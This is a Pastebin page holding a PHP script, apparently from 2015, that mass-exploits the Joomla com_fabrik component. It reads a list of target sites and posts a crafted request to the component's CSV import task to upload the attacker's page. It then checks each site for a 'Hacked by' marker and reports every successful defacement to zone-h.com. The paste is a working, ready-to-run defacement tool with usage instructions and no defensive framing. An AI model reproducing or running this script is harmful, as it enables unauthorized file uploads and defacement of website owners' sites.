API tools faq
paste
amiralbenz

com_fabrik auto ex

amiralbenz
Aug 28th, 2015
202
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.64 KB | None | 0 0
raw download clone embed print report
  1. <?php
  2.  
  3. *com_fabrik exploiter with submit on zone-h
  4. *usage : php fabrik.php list.txt
  5.  
  6. print"
  7. __ _ _ _
  8. / _| | | (_) | ________
  9. ___ ___ _ __ ___ | |_ __ _| |__ _ __ _| | __ |_ _| ____ exploit
  10. / __/ _ \| '_ ` _ \ | _/ _` | '_ \| '__| | |/ / ______ | | ||| | / \
  11. | (_| (_) | | | | | | | || (_| | |_) | | | | < | O | | |__||| | | (_) |
  12. \___\___/|_| |_| |_| |_| \__,_|_.__/|_| |_|_|\_\ |_____| |_ ___||____| \____/
  13. ______
  14. |______|
  15.  
  16.  
  17.  
  18. ";
  19.  
  20. $get2=@file_get_contents($argv[1]);
  21. $e=explode("\r\n",$get2);
  22. foreach($e as $site){
  23. echo "[+]scaning : $site\n";
  24. $post = array(
  25. "userfile" => "@d.txt", // this file is ur index .html or .txt
  26. "name" => "me.php",
  27. "drop_data" => "1",
  28. "overwrite" => "1",
  29. "field_delimiter" => ",",
  30. "text_delimiter" => "&quot;",
  31. "option" => "com_fabrik",
  32. "controller" => "import",
  33. "view" => "import",
  34. "task" => "doimport",
  35. "Itemid" => "0",
  36. "tableid" => "0",
  37. );
  38. $ch = curl_init ("$site/index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1");
  39. curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
  40. curl_setopt ($ch, CURLOPT_FOLLOWLOCATION, 1);
  41. curl_setopt ($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
  42. curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, 5);
  43. curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, 0);
  44. curl_setopt ($ch, CURLOPT_SSL_VERIFYHOST, 0);
  45. curl_setopt ($ch, CURLOPT_POST, 1);
  46. @curl_setopt ($ch, CURLOPT_POSTFIELDS, $post);
  47. $data = curl_exec ($ch);
  48. curl_close ($ch);
  49.  
  50. $ud=($site).("/media/d.txt"); // d.txt : rename it to name of ur index example if ur index named lol.html write it like that : /media/lol.html :D
  51. $get22=@file_get_contents($ud);
  52. if(eregi("Hacked by Mr.MaGnoM",$get22)){ // Hacked by Mr.MaGnoM : here put some words exist on ur index for cheek file was uploaded or no just 2 words or 3 or 1 example if u put ur name on index put it here
  53. echo "[-]Exploit : yes";
  54. echo "\n[-]Defaced : $ud\n";
  55. $ch3 = curl_init ("http://www.zone-h.com/notify/single");
  56. curl_setopt ($ch3, CURLOPT_RETURNTRANSFER, 1);
  57. curl_setopt ($ch3, CURLOPT_POST, 1);
  58. curl_setopt ($ch3, CURLOPT_POSTFIELDS, "defacer=Mr.MaGnoM&domain1=$ud&hackmode=1&reason=1"); // here put ur name on zone-h
  59. if (preg_match ("/color=\"red\">OK<\/font><\/li>/i", curl_exec ($ch3))){
  60. echo "[-]Zone-h : Ok "."\n\n";
  61. }else{
  62. echo "[-]Zone-h : No"."\n\n"; }
  63. curl_close ($ch3);
  64. }else{
  65. echo "[-]Exploit : no\n\n";
  66. }
  67. }
  68.  
  69.  
  70. ?>
Advertisement
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!